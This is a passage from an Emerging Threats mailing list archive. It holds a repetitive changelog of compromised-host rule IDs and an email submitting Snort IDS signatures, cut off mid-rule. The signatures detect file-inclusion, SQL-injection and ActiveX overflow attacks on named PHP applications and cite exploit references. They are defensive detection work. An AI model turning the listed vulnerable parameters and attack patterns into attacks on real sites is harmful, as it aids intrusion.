url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (88): 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From jonkman at jonkmans.com Mon Aug 10 12:49:12 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 10 Aug 2009 12:49:12 -0400 Subject: [Emerging-Sigs] StillSecure: 30 New Signatures - Aug - 05 - 2009 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2937@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2937@webmail.latis.com> Message-ID: <4A804F88.6050805@jonkmans.com> Posted, thanks!! Matt signatures wrote: > Hi Matt, > > Please find 30 New Signatures below: > > 1. *WEB-PHP Flatchat pmscript.php with Parameter Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Flatchat pmscript.php with Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/pmscript.php?"; nocase; uricontent:"with="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8549; reference:bugtraq,34734; > sid:2009503; rev:1;) > > 2. *WEB-PHP ECShop user.php order_sn Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > ECShop user.php order_sn Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/user.php?"; nocase; uricontent:"act=order_query"; nocase; > uricontent:"order_sn="; nocase; uricontent:"UNION"; nocase; > uricontent:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack; reference:bugtraq,34733; > reference:url,milw0rm.com/exploits/8548; sid:2009504; rev:1;) > > 3. *WEB-PHP 1024 CMS standard.php page_include Parameter Remote > File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > 1024 CMS standard.php page_include Parameter Remote File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/layouts/standard.php?"; nocase; uricontent:"page_include="; > nocase; pcre:"/page_include=\s*(https?|ftps?|php)\:\//Ui"; > classtype:web-application-attack; > reference:url,vupen.com/english/advisories/2009/0360; > reference:url,milw0rm.com/exploits/8003; sid:2009506; rev:1;) > > 4. *WEB-PHP AvailScript Photo Album Script pics.php sid Parameter > SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > AvailScript Photo Album Script pics.php sid Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/pics.php?"; nocase; uricontent:"sid="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,31085; reference:url,milw0rm.com/exploits/6411; > sid:2009518; rev:1;) > > 5. *WEB-PHP pHNews comments.php templates_dir Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > pHNews comments.php templates_dir Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/modules/comments.php?"; nocase; > uricontent:"templates_dir="; nocase; content:"../"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/6000; reference:bugtraq,19838; > sid:2009519; rev:1;) > > 6. *WEB-PHP pHNews comments.php template Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > pHNews comments.php template Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/modules/comments.php?"; nocase; uricontent:"template="; > nocase; content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/6000; reference:bugtraq,19838; > sid:2009520; rev:1;) > > 7. *WEB-PHP QuickTeam qte_web.php qte_web_path Parameter Local > File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/qte_web.php?"; nocase; uricontent:"qte_web_path="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,secunia.com/advisories/34997/; > reference:url,milw0rm.com/exploits/8602; sid:2009522; rev:1;) > > 8. *WEB-PHP QuickTeam qte_web.php qte_web_path Parameter Remote > File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/qte_web.php?"; nocase; uricontent:"qte_web_path="; nocase; > pcre:"/qte_web_path=\s*(ftps?|https?|php)\:\//Ui"; > classtype:web-application-attack; > reference:url,secunia.com/advisories/34997/; > reference:url,milw0rm.com/exploits/8602; sid:2009523; rev:1;) > > 9. *WEB-PHP QuickTeam qte_init.php qte_root Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > QuickTeam qte_init.php qte_root Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/bin/qte_init.php?"; nocase; uricontent:"qte_root="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,secunia.com/advisories/34997/; > reference:url,milw0rm.com/exploits/8602; sid:2009524; rev:1;) > > 10. *WEB-ATTACKS Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX > Control Remote Buffer Overflow* > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS > Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer > Overflow"; flow:to_client,established; content:"clsid"; nocase; > content:"9F1363DA-0220-462E-B923-9E3C9038896F"; nocase; distance:0; > content:"DiskType"; nocase; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8824;reference:bugtraq,23412; > sid:2009637; rev:1;) > > 11. *WEB-PHP TotalCalendar config.php inc_dir Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > TotalCalendar config.php inc_dir Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/config.php?"; nocase; uricontent:"inc_dir="; nocase; > content:"../"; classtype:web-application-attack; > reference:bugtraq,34617; reference:url,milw0rm.com/exploits/8494; > sid:2009490; rev:1;) > > 12. *WEB-PHP Scripts For Sites EZ e-store searchresults.php where > Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Scripts For Sites EZ e-store searchresults.php where Parameter SQL > Injection"; flow:to_server,established; content:"GET "; depth:4; > uricontent:"/SearchResults.php?"; nocase; uricontent:"where="; nocase; > 